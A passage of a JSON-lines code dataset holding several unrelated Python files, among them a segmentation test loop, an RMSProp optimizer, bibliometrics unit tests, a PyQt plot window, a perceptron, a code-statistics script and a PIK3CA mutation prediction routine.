pred.data.max(1)[1]\n correct = pred_choice.eq(target.data).cpu().sum()\n correct_percent = correct.item()/float(list(target.shape)[0])\n correct_percents.append(correct_percent)\n print('[%d/%d] accuracy: %f' %(i, num_test_batch, correct_percent))\n\n pred_color = cmap[pred_choice.numpy()[0], :]\n showpoints(points_np, None, pred_color, ballradius=4)\naverage_correct_percent = np.sum(correct_percents) / len(correct_percents)\nprint('Average accuracy: %f' % (correct_percent))\n","sub_path":"test_seg.py","file_name":"test_seg.py","file_ext":"py","file_size_in_byte":2922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"64609516","text":"import numpy as np\nfrom optimizer.Optimizer import Optimizer\n\n\nclass RmsProp(Optimizer):\n def __init__(self, learning_rate=0.01, decay_rate=0.99):\n self.learning_rate = learning_rate\n self.decay_rate = decay_rate\n self.h = None\n\n def update(self, params, grads):\n if self.h is None:\n self.h = {}\n for key, val in params.items():\n self.h[key] = np.zeros_like(val)\n\n for key in params.keys():\n self.h[key] = self.decay_rate * self.h[key] + (1 - self.decay_rate) * grads[key] * grads[key]\n params[key] -= self.learning_rate * grads[key] / (np.sqrt(self.h[key]) + 1e-7)\n","sub_path":"optimizer/RmsProp.py","file_name":"RmsProp.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"327046041","text":"\"\"\"\nUnit tests for publication_objects.py\n\"\"\"\n\n# pylint: disable=no-member, missing-docstring, len-as-condition\nimport logging\n\nimport pytest\n\nfrom bibliom.publication_objects import Paper, Author, Journal, Citation\nfrom bibliom.dbtable import DBTable\nfrom bibliom import exceptions\n\n@pytest.mark.usefixtures('class_manager')\nclass TestPaper():\n \"\"\"\n Unit tests for Paper class.\n \"\"\"\n def test_init(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_init')\n new_paper = Paper(manager=self.manager)\n assert isinstance(new_paper, Paper)\n assert not new_paper.was_retracted\n\n paper_table = DBTable.get_table_object('paper', self.manager)\n new_paper = Paper(table=paper_table)\n assert isinstance(new_paper, Paper)\n assert not new_paper.was_retracted\n\n new_paper = Paper(\n table=paper_table,\n fields_dict={\n 'title': \"A New Paper\",\n 'doi': \"10.1231/12312\"\n })\n assert new_paper.title == \"A New Paper\"\n assert new_paper.doi == \"10.1231/12312\"\n\n paper = Paper(\n table=paper_table,\n row_key='idpaper' + DBTable.KEY_STR_DELIMITER + '1'\n )\n assert paper.title\n \n def test_fetch(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_fetch')\n paper = Paper.fetch(\n manager=self.manager,\n where_dict={'doi': '10.1016/j.ijhydene.2016.06.178'}\n )\n assert paper.title == (\n 'Plasma equilibrium reconstruction for the nuclear fusion of ' +\n 'magnetically confined hydrogen isotopes'\n )\n paper = Paper.fetch(where_dict={'doi': '10.1016/j.ijhydene.2016.06.178'})\n assert paper.title == (\n 'Plasma equilibrium reconstruction for the nuclear fusion of ' +\n 'magnetically confined hydrogen isotopes'\n )\n paper = Paper.fetch(doi='10.1016/j.ijhydene.2016.06.178')\n assert paper.title == (\n 'Plasma equilibrium reconstruction for the nuclear fusion of ' +\n 'magnetically confined hydrogen isotopes'\n )\n\n def test_str(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_str')\n paper_table = DBTable.get_table_object('paper', self.manager)\n new_paper = Paper(\n table=paper_table,\n fields_dict={\n 'title': \"A New Paper\",\n 'doi': \"10.1231/12312\"\n })\n\n assert str(new_paper) == (\n 'A New Paper (10.1231/12312)'\n )\n\n def test_authors(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_authors')\n paper = Paper.fetch(\n where_dict={'doi': '10.1089/ars.2017.7361'}\n )\n assert len(paper.authors) == 2\n\n new_paper = Paper(\n fields_dict={\n 'title': \"A New Paper\",\n 'doi': \"10.1231/12312\"\n }\n )\n assert len(new_paper.authors) == 0\n\n def test_journal(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_journal')\n paper = Paper.fetch(\n where_dict={'doi': '10.1089/ars.2017.7361'}\n )\n assert paper.journal.title == 'ANTIOXIDANTS & REDOX SIGNALING'\n\n def test_cited_papers(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_cited_papers')\n paper = Paper.fetch(\n where_dict={'doi': '10.1089/ars.2017.7361'}\n )\n assert len(paper.cited_papers) == 177\n\n new_paper = Paper(\n fields_dict={\n 'title': \"A New Paper\",\n 'doi': \"10.1231/12312\"\n }\n )\n assert len(new_paper.cited_papers) == 0\n\n def test_citing_papers(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_citing_papers')\n paper = Paper.fetch(\n where_dict={'doi': 
'10.1016/j.ijhydene.2016.06.178'}\n )\n assert len(paper.citing_papers) == 5\n\n new_paper = Paper(\n fields_dict={\n 'title': \"A New Paper\",\n 'doi': \"10.1231/12312\"\n }\n )\n assert len(new_paper.citing_papers) == 0\n\n def test_cite(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestPaper.test_cite')\n source_paper = Paper.fetch(\n where_dict={'doi': '10.1016/j.ijhydene.2016.06.178'}\n )\n target_paper = Paper.fetch(\n where_dict={'doi': '10.1016/j.ijhydene.2016.07.026'}\n )\n new_citation = source_paper.cite(target_paper)\n new_citation.save_to_db()\n\n found = False\n for paper in source_paper.cited_papers:\n if paper.doi == '10.1016/j.ijhydene.2016.07.026':\n found = True\n break\n assert found\n\n found = False\n for paper in target_paper.citing_papers:\n if paper.doi == '10.1016/j.ijhydene.2016.06.178':\n found = True\n break\n assert found\n\n new_paper = Paper()\n with pytest.raises(exceptions.DBUnsyncedError):\n new_paper.cite(target_paper)\n with pytest.raises(exceptions.DBUnsyncedError):\n source_paper.cite(new_paper)\n\n with pytest.raises(TypeError):\n source_paper.cite(\"hello\")\n\n@pytest.mark.usefixtures('class_manager')\nclass TestAuthor():\n \"\"\"\n Unit tests for Author class.\n \"\"\"\n def test_init(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestAuthor.test_init')\n author_table = DBTable.get_table_object('author', self.manager)\n\n new_author = Author(\n manager=self.manager\n )\n assert isinstance(new_author, Author)\n\n new_author = Author(\n table=author_table\n )\n assert isinstance(new_author, Author)\n\n new_author = Author(\n table=author_table,\n fields_dict={\n 'last_name': 'Thicke',\n 'given_names': 'Mike'\n }\n )\n assert isinstance(new_author, Author)\n assert new_author.last_name == 'Thicke'\n\n new_author = Author(\n table=author_table,\n row_key='idauthor' + DBTable.KEY_STR_DELIMITER + '1'\n )\n assert isinstance(new_author, Author)\n assert new_author.last_name\n\n def test_str(self):\n logging.getLogger('bibliom.pytest').debug('-->TestAuthor.test_str')\n new_author = Author(\n manager=self.manager,\n fields_dict={\n 'last_name': 'Thicke',\n 'given_names': 'Michael Lowell Ellis'\n }\n )\n assert str(new_author) == 'Thicke, Michael Lowell Ellis'\n\n def test_from_string(self):\n logging.getLogger('bibliom.pytest').debug('-->TestAuthor.test_from_string')\n author_table = DBTable.get_table_object('author', self.manager)\n new_author = Author.from_string(author_table, 'Thicke, Michael Lowell Ellis')\n assert new_author.last_name == 'Thicke'\n assert new_author.given_names == 'Michael Lowell Ellis'\n\n new_author = Author.from_string(author_table, 'IPCC')\n assert new_author.corporate\n assert new_author.last_name == 'IPCC'\n\n def test_papers(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestAuthor.test_papers')\n author_table = DBTable.get_table_object('author', self.manager)\n\n author = Author(\n table=author_table,\n row_key='idauthor' + author_table.KEY_STR_DELIMITER + '1'\n )\n assert len(author.papers) == 1\n\n new_author = Author(\n manager=self.manager,\n fields_dict={\n 'last_name': 'Thicke',\n 'given_names': 'Michael Lowell Ellis'\n }\n )\n assert len(new_author.papers) == 0\n\n@pytest.mark.usefixtures('class_manager')\nclass TestJournal():\n \"\"\"\n Unit tests for Journal class.\n \"\"\"\n def test_init(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestJournal.test_init')\n journal_table = 
DBTable.get_table_object('journal', self.manager)\n\n journal = Journal(manager=self.manager)\n assert isinstance(journal, Journal)\n\n journal = Journal(table=journal_table)\n assert isinstance(journal, Journal)\n\n journal = Journal(\n table=journal_table,\n row_key='idjournal' + journal_table.KEY_STR_DELIMITER + '1')\n assert isinstance(journal, Journal)\n assert isinstance(journal.title, str)\n\n new_journal = Journal(\n table=journal_table,\n fields_dict={\n 'title': 'A Journal'\n }\n )\n assert new_journal.title == 'A Journal'\n\n def test_papers(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestJournal.test_papers')\n journal_table = DBTable.get_table_object('journal', self.manager)\n\n journal = Journal.fetch(\n table=journal_table,\n where_dict={\n 'issn': '1876-6102'\n }\n )\n assert len(journal.papers) == 148\n\n@pytest.mark.usefixtures('class_manager')\nclass TestCitation():\n \"\"\"\n Unit tests for Citation class.\n \"\"\"\n def test_init(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestCitation.test_init')\n citation_table = DBTable.get_table_object('citation', self.manager)\n\n citation = Citation(table=citation_table)\n assert isinstance(citation, Citation)\n\n citation = Citation(manager=self.manager)\n assert isinstance(citation, Citation)\n\n citation = Citation(\n table=citation_table,\n row_key=('source_id' +\n citation_table.KEY_STR_DELIMITER +\n 'target_id' +\n citation_table.KEY_STR_DELIMITER +\n '68' +\n citation_table.KEY_STR_DELIMITER +\n '75')\n )\n assert isinstance(citation, Citation)\n\n new_citation = Citation(\n table=citation_table,\n fields_dict={\n 'source_id': 100,\n 'target_id': 200\n }\n )\n assert isinstance(new_citation, Citation)\n assert new_citation.source_id == 100\n assert new_citation.target_id == 200\n\n def test_cite(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestCitation.test_cite')\n citation_table = DBTable.get_table_object('citation', self.manager)\n\n source_paper = Paper.fetch(\n where_dict={'doi': '10.1016/j.ijhydene.2016.06.178'}\n )\n target_paper = Paper.fetch(\n where_dict={'doi': '10.1016/j.ijhydene.2016.07.026'}\n )\n\n new_citation = Citation(table=citation_table)\n new_citation.cite(source_paper, target_paper)\n assert new_citation.source_id == source_paper.idpaper\n assert new_citation.target_id == target_paper.idpaper\n\n def test_source_paper_target_paper(self, import_small_database):\n logging.getLogger('bibliom.pytest').debug('-->TestCitation.test_source_paper_target_paper')\n citation_table = DBTable.get_table_object('citation', self.manager)\n paper_table = DBTable.get_table_object( 'paper', self.manager)\n\n citation = Citation(\n table=citation_table,\n row_key=('source_id' +\n citation_table.KEY_STR_DELIMITER +\n 'target_id' +\n citation_table.KEY_STR_DELIMITER +\n '68' +\n citation_table.KEY_STR_DELIMITER +\n '75')\n )\n source_paper = citation.source_paper\n assert source_paper.idpaper == 68\n assert source_paper.doi == '10.1140/epja/i2017-12405-4'\n target_paper = citation.target_paper\n assert target_paper.idpaper == 75\n assert target_paper.doi == '10.1088/1674-1137/41/11/113104'\n\n paper_1 = Paper(\n table=paper_table,\n row_key='idpaper' + DBTable.KEY_STR_DELIMITER + '1'\n )\n paper_2 = Paper(\n table=paper_table,\n row_key='idpaper' + DBTable.KEY_STR_DELIMITER + '2'\n )\n citation = Citation(table=citation_table)\n citation.source_paper = paper_1\n citation.target_paper = paper_2\n assert citation.source_id 
== 1\n assert citation.target_id == 2\n citation.save_to_db()\n assert paper_2 in paper_1.cited_papers\n assert paper_1 in paper_2.citing_papers\n","sub_path":"tests/test_publication_objects.py","file_name":"test_publication_objects.py","file_ext":"py","file_size_in_byte":13039,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"107337914","text":"import numpy as np\nimport pandas as pd\n\nclass MEnsamble:\n def __init__(self, Model, n, ws, bins, **kwparams):\n self.n = kwparams.get('n', n)\n self.Model = kwparams.get('Model', Model)\n self.ms = None\n self.idxs = None\n self.__updateN__(**kwparams)\n self.ws = kwparams.get('ws', ws)\n self.bins = kwparams.get('bins', bins)\n\n def __updateN__(self, **kwparams):\n self.ms = [self.Model(**kwparams) for i in range(self.n)]\n self.idxs = [[] for i in range(self.n)]\n\n def splitDataset(self, y):\n bres = [(y > (self.bins[i] - 1e-10)) & (y <= self.bins[i + 1]) for i in range(len(bins) - 1)]\n for i in range(self.n):\n res = []\n for j, w in enumerate(self.ws):\n res.append(np.random.choice(\n np.where(bres[j])[0],\n np.min([w, bres[j].sum()]),\n replace=False))\n # print(bres[j].sum(),w,len(res[-1]))\n self.idxs[i] = np.hstack(res)\n\n def fit(self, X, y, splitDataset=True):\n self.splitDataset(y)\n for m, idx in zip(self.ms, self.idxs):\n m.fit(X[idx], y[idx])\n\n def predict(self, X):\n yp = [m.predict(X) for m in self.ms]\n return np.median(yp, axis=0)\n\n def set_params(self, **params):\n m_keys = {}\n for p in params:\n assert not (hasattr(self, p) and hasattr(self.ms[0], p))\n if hasattr(self, p):\n self.__setattr__(p, params[p])\n if p == 'n':\n self.__updateN__()\n else:\n m_keys[p] = params[p]\n for m in self.ms:\n m.set_params(**m_keys)\n\n\nclass Model_Wrapper(object):\n def __init__(self, model, columns, X_scaler, Y_scaler):\n self.model = model\n self.columns = columns\n\n self.X_scaler = X_scaler\n\n self.Y_scaler = Y_scaler\n\n def predict(self, X):\n X = X[self.columns]\n\n Xs = self.X_scaler.transform(X)\n yp = self.model.predict(Xs)\n\n ys = self.Y_scaler.transform(yp)\n y = pd.DataFrame(ys)\n return y\n\n\nclass NoScale:\n def transform(self, x, *args, **kwargs):\n return x","sub_path":"aux/wrapper.py","file_name":"wrapper.py","file_ext":"py","file_size_in_byte":2233,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"228336527","text":"from PyQt4.QtCore import Qt\nfrom PyQt4.QtGui import QMainWindow, QDockWidget, QTabWidget\nfrom ert_gui.models.connectors.init import CaseSelectorModel\nfrom ert_gui.tools.plot import PlotPanel, DataTypeKeysWidget, CaseSelectionWidget, PlotMetricsWidget, ScaleTracker\nfrom ert_gui.tools.plot.data import PlotDataFetcher\nfrom ert_gui.widgets.util import may_take_a_long_time\n\n\nclass PlotWindow(QMainWindow):\n def __init__(self, parent):\n QMainWindow.__init__(self, parent)\n\n self.setMinimumWidth(750)\n self.setMinimumHeight(500)\n\n self.setWindowTitle(\"Plotting\")\n self.activateWindow()\n\n self.__central_tab = QTabWidget()\n self.setCentralWidget(self.__central_tab)\n\n\n self.__plot_panels = []\n\n self.addPlotPanel(\"Ensemble plot\", \"gui/plots/simple_plot.html\", short_name=\"Plot\")\n self.addPlotPanel(\"Ensemble overview plot\", \"gui/plots/simple_overview_plot.html\", short_name=\"oPlot\")\n self.addPlotPanel(\"Histogram\", \"gui/plots/histogram.html\", short_name=\"Histogram\")\n self.addPlotPanel(\"RFT plot\", \"gui/plots/rft.html\", short_name=\"RFT\")\n self.addPlotPanel(\"RFT overview plot\", \"gui/plots/rft_overview.html\", short_name=\"oRFT\")\n\n self.__data_type_keys_widget = DataTypeKeysWidget()\n self.__data_type_keys_widget.dataTypeKeySelected.connect(self.keySelected)\n self.addDock(\"Data types\", self.__data_type_keys_widget)\n\n current_case = CaseSelectorModel().getCurrentChoice()\n self.__case_selection_widget = CaseSelectionWidget(current_case)\n self.__case_selection_widget.caseSelectionChanged.connect(self.caseSelectionChanged)\n self.addDock(\"Plot case\", self.__case_selection_widget)\n\n self.__plot_metrics_widget = PlotMetricsWidget()\n self.__plot_metrics_widget.plotScalesChanged.connect(self.scalesChanged)\n self.__plot_metrics_widget.reportStepTimeChanged.connect(self.reportStepTimeChanged)\n self.addDock(\"Plot metrics\", self.__plot_metrics_widget)\n\n self.__data_type_key = None\n self.__plot_cases = self.__case_selection_widget.getPlotCaseNames()\n self.__value_scale_tracker = ScaleTracker(\"Value\")\n self.__time_scale_tracker = ScaleTracker(\"Time\")\n self.__depth_scale_tracker = ScaleTracker(\"Depth\")\n\n\n def addPlotPanel(self, name, path, short_name=None):\n if short_name is None:\n short_name = name\n\n plot_panel = PlotPanel(name, short_name, path)\n plot_panel.plotReady.connect(self.plotReady)\n self.__plot_panels.append(plot_panel)\n self.__central_tab.addTab(plot_panel, name)\n\n\n def addDock(self, name, widget, area=Qt.LeftDockWidgetArea, allowed_areas=Qt.AllDockWidgetAreas):\n dock_widget = QDockWidget(name)\n dock_widget.setObjectName(\"%sDock\" % name)\n dock_widget.setWidget(widget)\n dock_widget.setAllowedAreas(allowed_areas)\n dock_widget.setFeatures(QDockWidget.DockWidgetFloatable | QDockWidget.DockWidgetMovable)\n\n self.addDockWidget(area, dock_widget)\n return dock_widget\n\n\n def checkPlotStatus(self):\n for plot_panel in self.__plot_panels:\n if not plot_panel.isReady():\n return False\n\n if len(self.__plot_cases) == 0:\n return False\n\n return True\n\n def plotReady(self):\n if self.checkPlotStatus():\n self.__data_type_keys_widget.selectDefault()\n\n\n def caseSelectionChanged(self):\n self.__plot_cases = self.__case_selection_widget.getPlotCaseNames()\n self.keySelected(self.__data_type_key)\n\n def scalesChanged(self):\n value_min = self.__plot_metrics_widget.getValueMin()\n value_max = self.__plot_metrics_widget.getValueMax()\n time_min = self.__plot_metrics_widget.getTimeMin()\n 
time_max = self.__plot_metrics_widget.getTimeMax()\n depth_min = self.__plot_metrics_widget.getDepthMin()\n depth_max = self.__plot_metrics_widget.getDepthMax()\n\n self.__value_scale_tracker.setScaleValues(self.__data_type_key, value_min, value_max)\n self.__time_scale_tracker.setScaleValues(self.__data_type_key, time_min, time_max)\n self.__depth_scale_tracker.setScaleValues(self.__data_type_key, depth_min, depth_max)\n\n\n for plot_panel in self.__plot_panels:\n plot_panel.setScales(time_min, time_max, value_min, value_max, depth_min, depth_max)\n\n\n def reportStepTimeChanged(self):\n t = self.__plot_metrics_widget.getSelectedReportStepTime()\n\n for plot_panel in self.__plot_panels:\n plot_panel.setReportStepTime(t)\n\n\n def showOrHidePlotTab(self, plot_panel, is_visible, show_plot):\n plot_panel.setPlotIsVisible(show_plot)\n if show_plot and not is_visible:\n index = self.__plot_panels.index(plot_panel)\n self.__central_tab.insertTab(index, plot_panel, plot_panel.getName())\n elif not show_plot and is_visible:\n index = self.__central_tab.indexOf(plot_panel)\n self.__central_tab.removeTab(index)\n\n @may_take_a_long_time\n def keySelected(self, key):\n self.__data_type_key = str(key)\n\n plot_data_fetcher = PlotDataFetcher()\n for plot_panel in self.__plot_panels:\n visible = self.__central_tab.indexOf(plot_panel) > -1\n\n if plot_data_fetcher.isSummaryKey(self.__data_type_key):\n show_plot = plot_panel.supportsPlotProperties(time=True, value=True, histogram=True)\n self.showOrHidePlotTab(plot_panel, visible, show_plot)\n\n elif plot_data_fetcher.isBlockObservationKey(self.__data_type_key):\n show_plot = plot_panel.supportsPlotProperties(depth=True, value=True)\n self.showOrHidePlotTab(plot_panel, visible, show_plot)\n\n elif plot_data_fetcher.isGenKWKey(self.__data_type_key):\n show_plot = plot_panel.supportsPlotProperties(histogram=True)\n self.showOrHidePlotTab(plot_panel, visible, show_plot)\n\n elif plot_data_fetcher.isGenDataKey(self.__data_type_key):\n show_plot = plot_panel.supportsPlotProperties(time=True, value=True)\n self.showOrHidePlotTab(plot_panel, visible, show_plot)\n\n else:\n raise NotImplementedError(\"Key %s not supported.\" % self.__data_type_key)\n\n value_min = self.__value_scale_tracker.getMinimumScaleValue(self.__data_type_key)\n value_max = self.__value_scale_tracker.getMaximumScaleValue(self.__data_type_key)\n time_min = self.__time_scale_tracker.getMinimumScaleValue(self.__data_type_key)\n time_max = self.__time_scale_tracker.getMaximumScaleValue(self.__data_type_key)\n depth_min = self.__depth_scale_tracker.getMinimumScaleValue(self.__data_type_key)\n depth_max = self.__depth_scale_tracker.getMaximumScaleValue(self.__data_type_key)\n\n self.__plot_metrics_widget.updateScales(time_min, time_max, value_min, value_max, depth_min, depth_max)\n\n\n if self.checkPlotStatus():\n data = plot_data_fetcher.getPlotDataForKeyAndCases(self.__data_type_key, self.__plot_cases)\n data.setParent(self)\n\n for plot_panel in self.__plot_panels:\n plot_panel.setPlotData(data)\n\n","sub_path":"devel/python/python/ert_gui/tools/plot/plot_window.py","file_name":"plot_window.py","file_ext":"py","file_size_in_byte":7277,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"278187008","text":"from func import *\n\n\nclass Perceptron:\n def __init__(self, length, i=0, h=0.75):\n self.h = h # Сдвиг\n self.i = i # Храним порядковый номер персептрона\n self.weight = init_weight(length) # Инициализируем веса для текущего персептрона\n\n # Функция обучения\n def train(self, X, number, epochs=1, n=1):\n target = read_target(number) # Читаем данные, которые мы хотим получить от текущего персептрона\n for epoch in range(epochs): # Пробегаем по каждой эпохе\n net_y = net(X, self.weight) + ((-1) * self.h) # Суммируем произведения Xi*Wi\n z = activation_fun(net_y, self.h) # Предсказание персептрона (ступенчатая функция)\n err = target[self.i] - z # Получаем ошибку\n for i in range(len(self.weight)): # Пробегаем по всем весам и подстраиваем их\n self.weight[i] += err * X[i] * n\n self.h += err * (-1) * n # Также подстроим сдвиг\n\n # Функция получаения ответа\n def get_answer(self, X):\n net_y = net(X, self.weight) - self.h # Суммируем произведения Xi*Wi\n z = activation_fun(net_y, self.h) # Предсказание персептрона (ступенчатая функция)\n return z\n","sub_path":"lab_1/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":1577,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"513677678","text":"# #SUMMARY\r\n# Napisz program, który odczytuje wszystkie pliki stworzone przez Ciebie podczas\r\n# feriechallenge - przeszukuje lokalne katalogi lub łączy się w tym celu z Githubem.\r\n# Postaraj się jak najmniej hardcodować i na przykład nie podawaj listy wszystkich plików ręcznie\r\n# Następnie wykorzystując swój sposób katalogowania programów automat odczytuje\r\n# i wyświetla takie informacje:\r\n# - do ilu zadań z 10 napisało się kod\r\n# - liczba linijek kodu napisanych w każdym zadaniu (bez uwzględniania pustych!)\r\n# oraz sumaryczna liczba linijek\r\n# - liczba unikalnych słów użytych we wszystkich programach oraz najczęściej występujące słowo\r\n# - lista i liczba słów kluczowych użyta podczas ca��ego challenge (wykorzystaj moduł keywords)\r\n# - lista i liczba zaimportowanych modułów we wszystkich programach\r\n# Propozycja rozszerzenia: Po prostu miej odwagę i pochwal się outputem swojego programu!\r\n# - opublikuj posta z tagiem #feriechallenge i zostaw lajka na naszej stronie,\r\n# będzie nam miło 🙂 Możesz też oczywiście umieścić jakieś dodatkowe statystyki.\r\nfrom os import listdir\r\nfrom os.path import isfile, join\r\nimport keyword\r\n\r\nglobal_content = []\r\n\r\n\r\ndef filtered_code(content):\r\n filtered = []\r\n for line in content:\r\n if str(line).startswith('#'):\r\n continue\r\n if len(line) < 2:\r\n continue\r\n else:\r\n filtered.append(line.strip())\r\n return filtered\r\n\r\n\r\ndef word_count(content):\r\n wordsAndCount = {}\r\n \r\n for line in content:\r\n words_list = str(line).split()\r\n for word in words_list:\r\n wordd = word.strip(\"[](),.+-//='\")\r\n if wordd.isalpha():\r\n try:\r\n wordsAndCount[wordd] += 1\r\n except KeyError:\r\n wordsAndCount[wordd] = 1\r\n else:\r\n continue\r\n return wordsAndCount\r\n\r\n\r\ndef key_word_count(content):\r\n keyWordsCount = {}\r\n \r\n for line in content:\r\n words_list = str(line).split()\r\n for word in words_list:\r\n wordd = word.strip(\"[](),.+-=//'\")\r\n if keyword.iskeyword(wordd):\r\n try:\r\n keyWordsCount[wordd] += 1\r\n except KeyError:\r\n keyWordsCount[wordd] = 1\r\n else:\r\n continue\r\n\r\n return keyWordsCount\r\n\r\ndef imported_modules(content):\r\n importedModules={}\r\n for lines in content:\r\n for line in lines:\r\n if str(line).startswith('import'):\r\n word = line[7:]\r\n try:\r\n importedModules[word] += 1\r\n except KeyError:\r\n importedModules[word] = 1\r\n if str(line).startswith('from'):\r\n word = line[5:str(line).index('import')-1]\r\n try:\r\n importedModules[word] += 1\r\n except KeyError:\r\n importedModules[word] = 1\r\n else:\r\n continue\r\n return importedModules\r\n \r\nbaseDir = 'C:\\\\Projects\\\\Python\\\\HardCode\\\\scripts\\\\'\r\nonlyfiles = [f for f in listdir(baseDir) if isfile(join(baseDir, f)) if f.upper().endswith('.PY')]\r\ni = 0\r\nsummaryLine = 0\r\nsummaryLineCode = 0\r\n\r\nfor file in onlyfiles:\r\n i += 1\r\n print('\\n', '-'*10, i, file, '-'*10)\r\n with open(baseDir+file, \"r\") as file:\r\n content = file.readlines()\r\n summaryLine += len(content)\r\n print(len(content), ': number of lines')\r\n filtered = filtered_code(content)\r\n summaryLineCode += len(filtered)\r\n print(len(filtered), ': number of code lines', '\\n', '-'*40)\r\n global_content.append(filtered)\r\n \r\nwords = word_count(global_content)\r\nmodules = imported_modules(global_content)\r\ninverse = {value: key for key, value in words.items()}\r\n\r\nprint('imported modules:', modules)\r\nprint ('keywords: 
',key_word_count(global_content))\r\nprint('-'*10)\r\nprint('summary lines = ', summaryLine)\r\nprint('summary lines code = ', summaryLineCode)\r\nprint('Unique words in file: ', len(words))\r\nprint('max counted word: ', inverse[max(inverse.keys())],'-',max(inverse.keys()))\r\nprint('Imports count:', words['import'])\r\n","sub_path":"summary.py","file_name":"summary.py","file_ext":"py","file_size_in_byte":4271,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"168242334","text":"import os\nimport json\nimport numpy as np\nimport random\nimport torch\nfrom torch.utils.data import DataLoader\nfrom torchvision import models, transforms\n\nfrom PIK3CA_mutation.data_reader import ClsDataset\nfrom PIK3CA_mutation.utils import get_modelpath, net_prediction_oneshop, patient_res_m3_oneshop, save_results\n\n\ndef start_model(datapath, sampling_file, root_dir, model_type, seed=2020, gpu=\"0\", net=\"resnet18\",\n num_classes=2, num_workers=4, batch_size=256, norm_mean=[0.8201, 0.5207, 0.7189],\n norm_std=[0.1526, 0.1542, 0.1183]):\n \"\"\"\n Arguments:\n model_type: 'PIK3CA_Mutation', 'BLIS', 'IM', 'LAR', 'MES'\n net: resnet18, alexnet, resnet34, inception_v3\n\n Results:\n root_dir: ./FUSCC001_models/\n patch.json: ${root_dir}/${model_type}/patch.json\n patch.npz: ${root_dir}/${model_type}/patch.npz\n patient.json: ${root_dir}/${model_type}/patient.json\n patient.npz: ${root_dir}/${model_type}/patient.npz\n \"\"\"\n random.seed(seed)\n np.random.seed(seed)\n torch.manual_seed(seed)\n torch.cuda.manual_seed(seed)\n\n preprocess = transforms.Compose([\n transforms.Resize((256, 256)),\n transforms.ToTensor(), # Operated on original image, rewrite on previous transform.\n transforms.Normalize(norm_mean, norm_std)])\n\n print('Loading data...')\n testset = ClsDataset(sampling_file, datapath, preprocess)\n testloader = DataLoader(testset, batch_size=batch_size, shuffle=False, num_workers=num_workers)\n\n net = getattr(models, net)(pretrained=False, num_classes=num_classes)\n modelpath = get_modelpath(model_type)\n print('Loading model...', modelpath)\n\n if len(gpu) > 1:\n net = torch.nn.DataParallel(net).cuda()\n net.load_state_dict(torch.load(modelpath)) # load the finetune weight parameters\n else:\n net = net.cuda()\n net.load_state_dict({k.replace('module.',''):v for k,v in torch.load(modelpath).items()})\n\n # Patch Output: patch.json / patch.npz\n scores_patch, predictions_patch, namelist_patch = net_prediction_oneshop(testloader, net, num_classes)\n\n patch_results = save_results(namelist_patch, scores_patch[:, 1], predictions_patch, num_classes)\n with open(os.path.join(root_dir, model_type, 'patch.json'), 'w') as f:\n json.dump(patch_results, f)\n\n savename_patch = os.path.join(root_dir, model_type, 'patch.npz')\n np.savez(savename_patch, key_score=scores_patch, key_binpred=predictions_patch, key_namelist=namelist_patch)\n\n # Patient Output: patient.json / patient.npz\n scores_patient, predictions_patient, namelist_patient = patient_res_m3_oneshop(scores_patch, namelist_patch, num_classes)\n patient_results = save_results(namelist_patient, scores_patient[:, 1], predictions_patient, num_classes)\n with open(os.path.join(root_dir, model_type, 'patient.json'), 'w') as f:\n json.dump(patient_results[0], f)\n \n savename_patient = os.path.join(root_dir, model_type, 'patient.npz')\n np.savez(savename_patient, key_score=scores_patient, key_binpred=predictions_patient, key_namelist=namelist_patient)\n\n with open(os.path.join(root_dir, model_type, 'prediction.json'), 'w') as f:\n results = {\n \"model\": model_type,\n \"patient\": patient_results[0],\n \"patch\": patch_results\n }\n json.dump(results, f)\n","sub_path":"PIK3CA_mutation/single_prediction.py","file_name":"single_prediction.py","file_ext":"py","file_size_in_byte":3354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"392658154","text":"for num in range(1, 2):\r\n\r\n time = []\r\n total_flag = 0\r\n asterisk_flag = 0\r\n filename = \"New-Step\" + str(num) + \".txt\"\r\n for line in reversed(list(open(filename))):\r\n if line.startswith('Total (root+branch&cut)'):\r\n total_flag = 1\r\n continue\r\n\r\n if line.startswith('*'):\r\n asterisk_flag = 1\r\n continue\r\n\r\n if total_flag and asterisk_flag and line.startswith('Elapsed time'):\r\n pos1 = line.find('=')\r\n pos2 = line.find('sec.', pos1)\r\n time.append((line[pos1+1:pos2]).strip())\r\n total_flag = 0\r\n asterisk_flag = 0\r\n\r\n print(sum([float(time_point) for time_point in time]))\r\n","sub_path":"extract_time_new.py","file_name":"extract_time_new.py","file_ext":"py","file_size_in_byte":710,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
